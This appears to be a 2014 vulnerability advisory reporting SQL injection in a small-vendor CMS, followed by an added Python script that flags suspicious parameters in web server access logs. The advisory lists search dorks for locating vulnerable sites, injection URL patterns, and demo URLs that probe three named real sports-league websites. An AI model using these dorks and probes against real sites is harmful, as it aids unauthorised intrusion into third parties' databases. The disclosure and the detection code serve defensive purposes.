Sites created by J&W Communications appear to suffer from remote SQL injection vulnerabilities. Note that this finding houses site-specific data.
65f4085262255284edb648a36920c83ccae9bf601ad67291db7f5c7ac9a711b3
[+] Title: J&W Communications Cms SQL Injection Vulnerability
[+] Date: 2014-07-29
[+] Author: Hekt0r
[+] Vendor Homepage: www.jw-com.com
[+] Tested on: Windows7 & Kali Linux
[+] Vulnerable Files: /rosters.php
                      /team.php
                      /scoresheet.php
[+] Dork : intext:"designed by J&W Communications"
           inurl:/team.php.php?id=
           inurl:/rosters.php?id=
           inurl:/scoresheet.php?sched_id=
### POC: http://site/team.php.php?id=[SQL-Injection]
http://site/rosters.php?id=[SQL-Injection]
http://site/scoresheet.php?sched_id=[SQL-Injection]
### Demo: http://www.ambhl.ab.ca/team.php?id=132%27
http://edmbantamtourney.com/rosters.php?id=19%27
http://www.pwnhl.ca/scoresheet.php?sched_id=44%27
### Credits:
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Ali Ahmady, Saeed.Jok3r
M4hdi, Black Hacker, Vahid Hαcĸer, BlackErroR,
Phantom.S3c
And All members of Iran Security Group
[+] iransec.net
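
For operators of an affected site, the following added example (not part of the original advisory) scans web server access logs for requests to the three listed scripts whose `id` or `sched_id` value is not a plain integer. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameters named in the advisory.
WATCHED = {"/team.php": "id", "/rosters.php": "id", "/scoresheet.php": "sched_id"}

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_param(target):
    """Return (script, param, value) if a watched parameter is not a plain integer."""
    parts = urlsplit(target)
    for script, param in WATCHED.items():
        if not parts.path.endswith(script):
            continue
        # parse_qsl percent-decodes values; keep blanks so "id=" is also checked.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name == param and not re.fullmatch(r"\d{1,10}", value):
                return script, param, value
    return None

def scan(lines):
    """Return a list of (line_number, client_ip, script, param, value) per flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        finding = suspicious_param(match.group(1))
        if finding:
            hits.append((number, line.split(" ", 1)[0], *finding))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jul/2014:10:00:01 +0000] "GET /team.php?id=132 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/Jul/2014:10:00:05 +0000] "GET /team.php?id=132%27 HTTP/1.1" 200 310',
    '198.51.100.7 - - [29/Jul/2014:10:00:09 +0000] "GET /scoresheet.php?sched_id=44%27 HTTP/1.1" 200 298',
    '192.0.2.10 - - [29/Jul/2014:10:00:12 +0000] "GET /rosters.php?id=19&view=full HTTP/1.1" 200 4800',
    '203.0.113.9 - - [29/Jul/2014:10:00:14 +0000] "GET /rosters.php?id= HTTP/1.1" 200 305',
    '203.0.113.4 - - [29/Jul/2014:10:00:15 +0000] "GET /news.php?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A flagged request shows that a non-integer value was submitted, not that it succeeded; the fix on the server side is to bind these parameters as integers in parameterized queries.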